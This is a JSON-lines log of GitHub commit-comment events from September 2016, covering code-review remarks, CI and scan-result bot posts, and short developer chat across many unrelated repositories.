{"id":"4595364122","type":"CommitCommentEvent","actor":{"login":"rgoteti"},"repo":{"name":"rgoteti/birt_oda_dev"},"payload":{"comment":{"id":19111380,"position":null,"line":null,"path":null,"commit_id":"2e4d4d51e07e1f283c0eb213749986c051026c24","created_at":"2016-09-21T10:25:39Z","updated_at":"2016-09-21T10:25:39Z","body":"IHUBH-88 {Mongo 3.2 Driver} Remove “Consistent Request Session” in Property Binding of 3.x Mongodb UI plugin\r\n data/org.eclipse.birt.data.oda.mongodb/plugin.properties\r\n data/org.eclipse.birt.data.oda.mongodb/plugin.xml\r\n \r\n Changes in above files are related to IHub-88\r\n \r\nIHUBH-107 {Mongo 3.2 Driver} Test Connection is failing from analytics designer \r\n data/org.eclipse.birt.data.oda.mongodb/META-INF/MANIFEST.MF\r\n \r\n Changes in above files are related to IHub-107\r\n \r\nIHUBH-108 {Mongo 3.2} mongo 3.2 test connection is succeeded for negative scenarios as well \r\n mongodb.ui/src/org/eclipse/birt/data/oda/mongodb/ui/impl/MongoDBDataSourcePageHelper.java\r\n org.eclipse.birt.data.oda.mongodb/src/org/eclipse/birt/data/oda/mongodb/impl/MongoDBDriver.java\r\n \r\n Changes in above files are related to IHub-108.\r\n "}},"created_at":"2016-09-21T10:25:39Z"}
{"id":"4595368207","type":"CommitCommentEvent","actor":{"login":"EdmondFrank"},"repo":{"name":"EdmondFrank/Esurfing"},"payload":{"comment":{"id":19111389,"position":null,"line":null,"path":null,"commit_id":"7b9eb13f361b83f23a354ca43e0867abad19b24d","created_at":"2016-09-21T10:26:33Z","updated_at":"2016-09-21T10:26:33Z","body":"@Beloya 然而并没有失效,我在宿舍还是用这种方法登录校园网!"}},"created_at":"2016-09-21T10:26:33Z"}
{"id":"4595368243","type":"CommitCommentEvent","actor":{"login":"escalade"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19111390,"position":null,"line":null,"path":null,"commit_id":"e3c560014c6c616cccbb9d29ae565ce502991a20","created_at":"2016-09-21T10:26:33Z","updated_at":"2016-09-21T10:26:33Z","body":"The logic here is broken somehow, see https://github.com/libretro/RetroArch/issues/3626"}},"created_at":"2016-09-21T10:26:33Z"}
{"id":"4595370812","type":"CommitCommentEvent","actor":{"login":"YuriyNasretdinov"},"repo":{"name":"getsupertext/soft-mocks"},"payload":{"comment":{"id":19111393,"position":null,"line":null,"path":null,"commit_id":"be1f22bd8d80b9e5c1548a8082c8f38d2d4a7fb4","created_at":"2016-09-21T10:27:08Z","updated_at":"2016-09-21T10:27:08Z","body":"Ok\nOn Wed, 21 Sep 2016 at 12:23, Mikael Andersson <notifications@github.com>\nwrote:\n\n> Thanks Yuriy,\n>\n> Good advice, and yes I realized that after a bit. At the outset I did not\n> think I could get away with only rewriting require/include, so I thought\n> AST-rewriting was the best way forward. Fortunately I seem to be wrong\n> about that, so I'll update with a refactored implementation at my first\n> opportunity.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/getsupertext/soft-mocks/commit/be1f22bd8d80b9e5c1548a8082c8f38d2d4a7fb4#commitcomment-19110651>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAjJuSzSK5tcSq2SIWi16fJv6jsUb9_uks5qsPeAgaJpZM4J6dXT>\n> .\n>\n"}},"created_at":"2016-09-21T10:27:08Z"}
{"id":"4595371283","type":"CommitCommentEvent","actor":{"login":"thankjura"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19111395,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-21T10:27:14Z","updated_at":"2016-09-21T10:27:14Z","body":"@mpkh А что за патч?"}},"created_at":"2016-09-21T10:27:14Z"}
{"id":"4595372997","type":"CommitCommentEvent","actor":{"login":"sjparkinson"},"repo":{"name":"Financial-Times/endpoint-manager"},"payload":{"comment":{"id":19111397,"position":31,"line":143,"path":"index.js","commit_id":"62c81b5b60a174c5ff3062c591a0b26557c3dd8d","created_at":"2016-09-21T10:27:36Z","updated_at":"2016-09-21T10:27:36Z","body":":bug: "}},"created_at":"2016-09-21T10:27:36Z"}
{"id":"4595374993","type":"CommitCommentEvent","actor":{"login":"mohibeyki"},"repo":{"name":"mohibeyki/Keen-UI"},"payload":{"comment":{"id":19111402,"position":null,"line":null,"path":null,"commit_id":"3dcb069d92829825abe99ef4a9c18e13a087a2ed","created_at":"2016-09-21T10:28:02Z","updated_at":"2016-09-21T10:28:02Z","body":"@mahdisyazdani Plz send merge requests before changing anything in here to keep record :)\r\n:pray:"}},"created_at":"2016-09-21T10:28:02Z"}
{"id":"4595377368","type":"CommitCommentEvent","actor":{"login":"Akarazeev"},"repo":{"name":"nltk/nltk_book_rus"},"payload":{"comment":{"id":19111405,"position":null,"line":null,"path":null,"commit_id":"433caec014a62e13eb64c341ffa0f3b4985a90d5","created_at":"2016-09-21T10:28:33Z","updated_at":"2016-09-21T10:28:33Z","body":"Hi! Is somebody translating this book now? :)"}},"created_at":"2016-09-21T10:28:33Z"}
{"id":"4595379452","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19111409,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-21T10:29:00Z","updated_at":"2016-09-21T10:29:00Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-21T10:29:00Z"}
{"id":"4595379767","type":"CommitCommentEvent","actor":{"login":"AlexisEidelman"},"repo":{"name":"edarin/population_simulator"},"payload":{"comment":{"id":19111411,"position":24,"line":35,"path":"src/Simulation_brute.py","commit_id":"7d9c6a544061267f1f9b61c561ffe52a1ba9d771","created_at":"2016-09-21T10:29:05Z","updated_at":"2016-09-21T10:29:05Z","body":"On peut supprimer après le check_tirage, tu as raison"}},"created_at":"2016-09-21T10:29:05Z"}
{"id":"4595384750","type":"CommitCommentEvent","actor":{"login":"Sneha31"},"repo":{"name":"Sneha31/Regression-Script"},"payload":{"comment":{"id":19111426,"position":null,"line":null,"path":null,"commit_id":"c688eef25c44c3e105d77c3270a4fa3778ec84b2","created_at":"2016-09-21T10:30:08Z","updated_at":"2016-09-21T10:30:08Z","body":"21sep"}},"created_at":"2016-09-21T10:30:08Z"}
{"id":"4595385771","type":"CommitCommentEvent","actor":{"login":"WX-JIN"},"repo":{"name":"WX-JIN/JGallery"},"payload":{"comment":{"id":19111428,"position":null,"line":null,"path":null,"commit_id":"853a68229c4ef177122bf4e87343fa3d895d06f5","created_at":"2016-09-21T10:30:20Z","updated_at":"2016-09-21T10:30:20Z","body":"msg"}},"created_at":"2016-09-21T10:30:20Z"}
{"id":"4595387126","type":"CommitCommentEvent","actor":{"login":"HamdiBayhan"},"repo":{"name":"HamdiBayhan/Card-Entry-System-Project-with-Rails"},"payload":{"comment":{"id":19111431,"position":10,"line":12,"path":"app/controllers/members_controller.rb","commit_id":"46e74b53d35d5c3ca9df26f4b37b35ecd92abba2","created_at":"2016-09-21T10:30:38Z","updated_at":"2016-09-21T10:30:38Z","body":"I'm going to pay attention to the rules and read I'm going to read \"ruby style guide\"."}},"created_at":"2016-09-21T10:30:38Z"}
{"id":"4595388016","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19111432,"position":null,"line":null,"path":null,"commit_id":"45594f6e519fee2623620e3af85e3e1e581765da","created_at":"2016-09-21T10:30:49Z","updated_at":"2016-09-21T10:30:49Z","body":"We want to move it out of the release-scripts and publish it as part of the makefiles"}},"created_at":"2016-09-21T10:30:49Z"}
{"id":"4595388089","type":"CommitCommentEvent","actor":{"login":"AlexisEidelman"},"repo":{"name":"edarin/population_simulator"},"payload":{"comment":{"id":19111433,"position":16,"line":87,"path":"src/tools.py","commit_id":"d5277641f9a98b058f486fb0667daa64a8bb2a0d","created_at":"2016-09-21T10:30:50Z","updated_at":"2016-09-21T10:30:50Z","body":"Si si que dans le cas d'une variable à deux modalités mais j'anticipe que ce sera un cas fréquent...\r\n\r\nPour proba_activité du  raison, on peut le mettre à 'proba' et renommer ensuite, en dehors de la fonction"}},"created_at":"2016-09-21T10:30:50Z"}
{"id":"4595390275","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19111439,"position":null,"line":null,"path":null,"commit_id":"cc650542018a216e1af66982885877a68cd80a16","created_at":"2016-09-21T10:31:19Z","updated_at":"2016-09-21T10:31:19Z","body":"Still work not good with your 10c/10d branch.\r\n"}},"created_at":"2016-09-21T10:31:19Z"}
{"id":"4595396452","type":"CommitCommentEvent","actor":{"login":"justanotheranonymoususer"},"repo":{"name":"notepad-plus-plus/notepad-plus-plus"},"payload":{"comment":{"id":19111450,"position":null,"line":null,"path":null,"commit_id":"f3d88284d75112924100fd66689a4383a6748371","created_at":"2016-09-21T10:32:41Z","updated_at":"2016-09-21T10:32:41Z","body":"Thanks for this fix. Same issue with Javascript backticks:\r\nhttps://github.com/notepad-plus-plus/notepad-plus-plus/blob/master/PowerEditor/src/stylers.model.xml#L429\r\n\r\nForum post:\r\nhttps://notepad-plus-plus.org/community/topic/11366/javascript-back-tick-quoted-strings-bad-color"}},"created_at":"2016-09-21T10:32:41Z"}
{"id":"4595397751","type":"CommitCommentEvent","actor":{"login":"lukjel"},"repo":{"name":"lukjel/vertx-hazelcast"},"payload":{"comment":{"id":19111454,"position":null,"line":null,"path":null,"commit_id":"f441e78445ffb667da0b8d3898b2df267c0ef994","created_at":"2016-09-21T10:32:57Z","updated_at":"2016-09-21T10:32:57Z","body":"Adding \"troubleshoot\": killing node makes cluster unbalanced (hazelcasr parameter hazelcast.max.no.heartbeat.seconds)"}},"created_at":"2016-09-21T10:32:57Z"}
{"id":"4595399768","type":"CommitCommentEvent","actor":{"login":"MatthewVance"},"repo":{"name":"MatthewVance/nginx-build"},"payload":{"comment":{"id":19111456,"position":null,"line":null,"path":null,"commit_id":"368db4eee29407f2ee22f98de39d739dcdf7973e","created_at":"2016-09-21T10:33:23Z","updated_at":"2016-09-21T10:33:23Z","body":"Sure. It's a useful enough module to add back in. I haven't been using it, but will be soon in my new Docker version. Sorry for breaking things for you when I removed it. \n\n> On Sep 21, 2016, at 5:17 AM, GainfulShrimp <notifications@github.com> wrote:\n> \n> Any chance of putting the http_map_module back please? It's just taken me a while to work out why my websocket app had stopped working via my RPi2 based nginx reverse proxy (which I build using your fantastic script!)... it's because the usual nginx websocket proxying config relies on setting connection upgrade variables via 'map' directive:\n> https://www.nginx.com/blog/websocket-nginx/\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-21T10:33:23Z"}
{"id":"4595400384","type":"CommitCommentEvent","actor":{"login":"paddor"},"repo":{"name":"thewesch/ba-roadster-doc"},"payload":{"comment":{"id":19111458,"position":null,"line":null,"path":null,"commit_id":"07e124f562423a85247f8e8ef0646d196389543d","created_at":"2016-09-21T10:33:31Z","updated_at":"2016-09-21T10:33:31Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;xLXBYViH&#x2F;14-bli\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> bli</a>"}},"created_at":"2016-09-21T10:33:31Z"}
{"id":"4595402176","type":"CommitCommentEvent","actor":{"login":"qreeves"},"repo":{"name":"red-eclipse/master"},"payload":{"comment":{"id":19111461,"position":null,"line":null,"path":null,"commit_id":"42e0f01626ab6d4a850d6b03f9aa49fe536634eb","created_at":"2016-09-21T10:33:56Z","updated_at":"2016-09-21T10:33:56Z","body":"Hmmm, maybe I should add some DNS resolution to this so you can use a DynDNS service."}},"created_at":"2016-09-21T10:33:56Z"}
{"id":"4595409572","type":"CommitCommentEvent","actor":{"login":"moldcraft"},"repo":{"name":"ThemeFuse/Unyson-MegaMenu-Extension"},"payload":{"comment":{"id":19111480,"position":null,"line":null,"path":null,"commit_id":"20bc79926e99438ee71794d48f68b5d8557a653b","created_at":"2016-09-21T10:35:36Z","updated_at":"2016-09-21T10:35:36Z","body":"@dinhtungdu I am not sure if it works right. Nobody have tested it yet. [Please test](https://github.com/ThemeFuse/Unyson-MegaMenu-Extension/issues/14) and let me know if it works right."}},"created_at":"2016-09-21T10:35:36Z"}
{"id":"4595411723","type":"CommitCommentEvent","actor":{"login":"chimurai"},"repo":{"name":"chimurai/http-proxy-middleware"},"payload":{"comment":{"id":19111482,"position":null,"line":null,"path":null,"commit_id":"53fe79b6c36ca4034c3fd68ffb29bcc81d84e576","created_at":"2016-09-21T10:36:05Z","updated_at":"2016-09-21T10:36:05Z","body":"Can you share your server+proxy configuration?"}},"created_at":"2016-09-21T10:36:05Z"}
{"id":"4595415103","type":"CommitCommentEvent","actor":{"login":"Parovozik"},"repo":{"name":"benvanik/xenia"},"payload":{"comment":{"id":19111492,"position":null,"line":null,"path":null,"commit_id":"a3c2b8b3f5b12762214556b44abc0c152cafc27b","created_at":"2016-09-21T10:36:51Z","updated_at":"2016-09-21T10:36:51Z","body":"Hey. I happen to know that you've added mapping for keyboard on the controller L-R triggers and plan to add the remaining two buttons? (L_R Bumpers)\r\n:)"}},"created_at":"2016-09-21T10:36:51Z"}
{"id":"4595417854","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19111494,"position":null,"line":null,"path":null,"commit_id":"ec522547e5f91792a13fe9aaf678f3e1b5ca42bc","created_at":"2016-09-21T10:37:26Z","updated_at":"2016-09-21T10:37:26Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-21T10:37:26Z"}
{"id":"4595417952","type":"CommitCommentEvent","actor":{"login":"GainfulShrimp"},"repo":{"name":"MatthewVance/nginx-build"},"payload":{"comment":{"id":19111496,"position":null,"line":null,"path":null,"commit_id":"368db4eee29407f2ee22f98de39d739dcdf7973e","created_at":"2016-09-21T10:37:28Z","updated_at":"2016-09-21T10:37:28Z","body":"Thanks and no worries... investigating it gave me some useful reminders of things I need to update in my config tbh! :)"}},"created_at":"2016-09-21T10:37:28Z"}
{"id":"4595419118","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19111499,"position":null,"line":null,"path":null,"commit_id":"a5924cf0aa5c7bc55146f3d9bc26212c3e0a87b5","created_at":"2016-09-21T10:37:44Z","updated_at":"2016-09-21T10:37:44Z","body":"Woohoo, `sd-init` works.\n"}},"created_at":"2016-09-21T10:37:44Z"}
{"id":"4595425128","type":"CommitCommentEvent","actor":{"login":"dortal"},"repo":{"name":"dortal/bookstorephp4_9810_lines"},"payload":{"comment":{"id":19111506,"position":null,"line":null,"path":null,"commit_id":"0d90a48ef1c8bd6d84ce271e1dd777964763d87d","created_at":"2016-09-21T10:39:02Z","updated_at":"2016-09-21T10:39:02Z","body":"The scan failed.\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/dortal/bookstorephp4_9810_lines/commit/0d90a48ef1c8bd6d84ce271e1dd777964763d87d\">0d90a48ef1c8bd6d84ce271e1dd777964763d87d</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2016-09-21T10:39:02Z"}
{"id":"4595425200","type":"CommitCommentEvent","actor":{"login":"hlashila"},"repo":{"name":"hlashila/checkmarx"},"payload":{"comment":{"id":19111508,"position":null,"line":null,"path":null,"commit_id":"7b10a2f1246fbdd5a03cecf1ff18b2935b259960","created_at":"2016-09-21T10:39:03Z","updated_at":"2016-09-21T10:39:03Z","body":"The scan failed.\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/hlashila/checkmarx/commit/7b10a2f1246fbdd5a03cecf1ff18b2935b259960\">7b10a2f1246fbdd5a03cecf1ff18b2935b259960</a></td><td>@hlashila</td></tr></table>\r\n"}},"created_at":"2016-09-21T10:39:03Z"}
{"id":"4595425925","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19111509,"position":null,"line":null,"path":null,"commit_id":"8764fb9e814af6ff02858cb0c970767bdbd4af2e","created_at":"2016-09-21T10:39:13Z","updated_at":"2016-09-21T10:39:13Z","body":"@hydra: Each rebase means another mail 'You are receiving this because you were mentioned.'; nine of them so far ... "}},"created_at":"2016-09-21T10:39:13Z"}
{"id":"4595427794","type":"CommitCommentEvent","actor":{"login":"Reinmar"},"repo":{"name":"ckeditor/ckeditor5-typing"},"payload":{"comment":{"id":19111512,"position":8,"line":49,"path":"src/input.js","commit_id":"25e0429adffb8e0c07e7099c9336dd3afb914713","created_at":"2016-09-21T10:39:39Z","updated_at":"2016-09-21T10:39:39Z","body":"lock and unlock should wrap the contents of https://github.com/ckeditor/ckeditor5-typing/blob/master/src/input.js#L152-L164. If they won't be able to catch all changes caused by this specific code, then please report it as TC in https://github.com/ckeditor/ckeditor5-engine/issues/603"}},"created_at":"2016-09-21T10:39:39Z"}
{"id":"4595429057","type":"CommitCommentEvent","actor":{"login":"jhpark816"},"repo":{"name":"jam2in/arcus-java-client"},"payload":{"comment":{"id":19111513,"position":9,"line":207,"path":"src/main/java/net/spy/memcached/ArcusKetamaNodeLocator.java","commit_id":"d9e48693f74ae3c5e75a82139b3d8b24f3883cb8","created_at":"2016-09-21T10:39:55Z","updated_at":"2016-09-21T10:39:55Z","body":"현재의 TreeMap 구조에는 아래 구조의 entry가 그나마 적합할 것 같네요.\r\n- \\< key,  sorted set of nodes \\>"}},"created_at":"2016-09-21T10:39:55Z"}
{"id":"4595429736","type":"CommitCommentEvent","actor":{"login":"dortal"},"repo":{"name":"dortal/bookstorephp4_9810_lines"},"payload":{"comment":{"id":19111514,"position":null,"line":null,"path":null,"commit_id":"0d90a48ef1c8bd6d84ce271e1dd777964763d87d","created_at":"2016-09-21T10:40:04Z","updated_at":"2016-09-21T10:40:04Z","body":"Checkmarx scan results 21 Sep 2016 13:40 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://localhost:6311/CxWebClient/ViewerMain.aspx?scanid=1000054&projectid=28\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/dortal/bookstorephp4_9810_lines/commit/0d90a48ef1c8bd6d84ce271e1dd777964763d87d\">0d90a48ef1c8bd6d84ce271e1dd777964763d87d</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2016-09-21T10:40:04Z"}
{"id":"4595430690","type":"CommitCommentEvent","actor":{"login":"leylaKapi"},"repo":{"name":"HamdiBayhan/Card-Entry-System-Project-with-Rails"},"payload":{"comment":{"id":19111516,"position":5,"line":4,"path":"Gemfile","commit_id":"3d0f100b398de300e35f1e25538ac1b353ccbd6e","created_at":"2016-09-21T10:40:15Z","updated_at":"2016-09-21T10:40:15Z","body":"@HamdiBayhan You should use ransack gem instead of elasticsearch "}},"created_at":"2016-09-21T10:40:15Z"}
{"id":"4595432809","type":"CommitCommentEvent","actor":{"login":"Reinmar"},"repo":{"name":"ckeditor/ckeditor5-typing"},"payload":{"comment":{"id":19111520,"position":18,"line":82,"path":"src/input.js","commit_id":"25e0429adffb8e0c07e7099c9336dd3afb914713","created_at":"2016-09-21T10:40:42Z","updated_at":"2016-09-21T10:40:42Z","body":"This is incorrect. Why do you unlock now, if you haven't locked anything in this method? The lock & unlock should be kept in one place and in this case they should be in https://github.com/ckeditor/ckeditor5-typing/commit/25e0429adffb8e0c07e7099c9336dd3afb914713#diff-8052e4286a369903aa5d7f6c2d8b7190R88."}},"created_at":"2016-09-21T10:40:42Z"}
{"id":"4595433190","type":"CommitCommentEvent","actor":{"login":"mpkh"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19111521,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-21T10:40:47Z","updated_at":"2016-09-21T10:40:47Z","body":"@thankjura не помню, сейчас тоже не могу найти, может быть это только в новой версии нужно чинить, что бы wayland ставился опционально."}},"created_at":"2016-09-21T10:40:47Z"}
{"id":"4595433701","type":"CommitCommentEvent","actor":{"login":"BATTERY12"},"repo":{"name":"alexrj/Slic3r"},"payload":{"comment":{"id":19111523,"position":null,"line":null,"path":null,"commit_id":"b52d569aba7e1a4c6bcb5fefbcae128d755dbadd","created_at":"2016-09-21T10:40:54Z","updated_at":"2016-09-21T10:40:54Z","body":"Could you please tell me if it is possible to use the Slic3r program to send each layer of a sliced drawing to print on a inkjet printer.\r\n"}},"created_at":"2016-09-21T10:40:54Z"}
{"id":"4595433771","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19111525,"position":null,"line":null,"path":null,"commit_id":"ec522547e5f91792a13fe9aaf678f3e1b5ca42bc","created_at":"2016-09-21T10:40:55Z","updated_at":"2016-09-21T10:40:55Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-21T10:40:55Z"}
{"id":"4595434602","type":"CommitCommentEvent","actor":{"login":"Reinmar"},"repo":{"name":"ckeditor/ckeditor5-typing"},"payload":{"comment":{"id":19111526,"position":17,"line":73,"path":"src/changebuffer.js","commit_id":"25e0429adffb8e0c07e7099c9336dd3afb914713","created_at":"2016-09-21T10:41:07Z","updated_at":"2016-09-21T10:41:07Z","body":"isLocked should be checked in `_reset()`"}},"created_at":"2016-09-21T10:41:07Z"}
{"id":"4595436662","type":"CommitCommentEvent","actor":{"login":"Reinmar"},"repo":{"name":"ckeditor/ckeditor5-typing"},"payload":{"comment":{"id":19111529,"position":25,"line":81,"path":"src/changebuffer.js","commit_id":"25e0429adffb8e0c07e7099c9336dd3afb914713","created_at":"2016-09-21T10:41:36Z","updated_at":"2016-09-21T10:41:36Z","body":"You also need a listener for `change:range` to have a better understanding whether locking used in the input feature works fine."}},"created_at":"2016-09-21T10:41:36Z"}
{"id":"4595436870","type":"CommitCommentEvent","actor":{"login":"brozkrut"},"repo":{"name":"minio/minio-js"},"payload":{"comment":{"id":19111531,"position":null,"line":null,"path":null,"commit_id":"07ce5e3582c4aa758f61526c667b4b18cb3d017f","created_at":"2016-09-21T10:41:39Z","updated_at":"2016-09-21T10:41:39Z","body":"Is that a joke? So huge API change and no information about that change and minor version bump? It broke our node.js scripts with ^2.0.1 package.json setting. And there is README.md with wrong API usage."}},"created_at":"2016-09-21T10:41:39Z"}
{"id":"4595441476","type":"CommitCommentEvent","actor":{"login":"wjf0104"},"repo":{"name":"MinyaHu/921first"},"payload":{"comment":{"id":19111543,"position":null,"line":null,"path":null,"commit_id":"312c4bda7889273b5ea09f5bc0e76e0776e715a4","created_at":"2016-09-21T10:42:43Z","updated_at":"2016-09-21T10:42:43Z","body":"来来来"}},"created_at":"2016-09-21T10:42:43Z"}
{"id":"4595441498","type":"CommitCommentEvent","actor":{"login":"thecoshman"},"repo":{"name":"thecoshman/youareabadlet"},"payload":{"comment":{"id":19111544,"position":10,"line":18,"path":"index.html","commit_id":"8163eac71d953ad6f9f480989ed41dd0ba1952a1","created_at":"2016-09-21T10:42:43Z","updated_at":"2016-09-21T10:42:43Z","body":"What is where and how?"}},"created_at":"2016-09-21T10:42:43Z"}
{"id":"4595441705","type":"CommitCommentEvent","actor":{"login":"IliyaNovikov"},"repo":{"name":"jsonfx/jsonfx"},"payload":{"comment":{"id":19111545,"position":null,"line":null,"path":null,"commit_id":"b4f351deefeb03ca32a987f07a99960a239d245f","created_at":"2016-09-21T10:42:47Z","updated_at":"2016-09-21T10:42:47Z","body":"The PR number is #47. Thank you"}},"created_at":"2016-09-21T10:42:47Z"}
{"id":"4595450408","type":"CommitCommentEvent","actor":{"login":"skydreamer1"},"repo":{"name":"skydreamer1/hello-world"},"payload":{"comment":{"id":19111559,"position":null,"line":null,"path":null,"commit_id":"5118f6ae9fb613caff4d4d87e5e4d57334d70780","created_at":"2016-09-21T10:44:50Z","updated_at":"2016-09-21T10:44:50Z","body":"ok"}},"created_at":"2016-09-21T10:44:50Z"}
{"id":"4595451023","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19111561,"position":null,"line":null,"path":null,"commit_id":"0522e8da0438f1be80fb4a50cc05d626c6b8b9bb","created_at":"2016-09-21T10:44:59Z","updated_at":"2016-09-21T10:44:59Z","body":"Q1: √\r\nQ2: You will try to fix.\r\nQ3: still not work, tomorrow I will push stock vidc drivers change with your now vidc drivers.\r\nQ4: √"}},"created_at":"2016-09-21T10:44:59Z"}
{"id":"4595453986","type":"CommitCommentEvent","actor":{"login":"NBruderman"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":19111567,"position":null,"line":null,"path":null,"commit_id":"a63f3a3b09fae2a9dfe330fd7fbde1b158686eff","created_at":"2016-09-21T10:45:38Z","updated_at":"2016-09-21T10:45:38Z","body":"I think it breaks all the normal chat extra features, I cannot see them anymore"}},"created_at":"2016-09-21T10:45:38Z"}
{"id":"4595454965","type":"CommitCommentEvent","actor":{"login":"rui-castro"},"repo":{"name":"keeps/roda"},"payload":{"comment":{"id":19111574,"position":5,"line":97,"path":"README.md","commit_id":"17c302a7552a8f39cacdab7460665b56b738a368","created_at":"2016-09-21T10:45:52Z","updated_at":"2016-09-21T10:45:52Z","body":"\"Translations are not maintained by Transifex\" or \"Translations are maintained by Transifex\"?"}},"created_at":"2016-09-21T10:45:52Z"}
{"id":"4595455431","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine"},"payload":{"comment":{"id":19111575,"position":null,"line":null,"path":null,"commit_id":"43812c3b01f6b0abcd9d975bf45dad6b86f207e5","created_at":"2016-09-21T10:45:58Z","updated_at":"2016-09-21T10:45:58Z","body":"哦哦哦，寒寒抱！\r\n话说设计器写好了，不去看看吗。。。。 😂 "}},"created_at":"2016-09-21T10:45:58Z"}
{"id":"4595455907","type":"CommitCommentEvent","actor":{"login":"rareddy"},"repo":{"name":"rareddy/teiid"},"payload":{"comment":{"id":19111577,"position":null,"line":null,"path":null,"commit_id":"5ea950e340f91fbb8b16c3c61ee3c20af3d33ee7","created_at":"2016-09-21T10:46:04Z","updated_at":"2016-09-21T10:46:04Z","body":"What is error you saw, I thought I already fixed this?"}},"created_at":"2016-09-21T10:46:04Z"}
{"id":"4595458129","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19111585,"position":6,"line":31,"path":"static/js/controllers/contacts-content.js","commit_id":"f811aef39023270b854af8119a5f3b7eb26fe8f0","created_at":"2016-09-21T10:46:33Z","updated_at":"2016-09-21T10:46:33Z","body":"So is not declaring scope-level variables at some base place how it's done in JS land? Seems like it reduces discoverability and readability: for you to find out that the scoped variable exists you have to read function implementations."}},"created_at":"2016-09-21T10:46:33Z"}
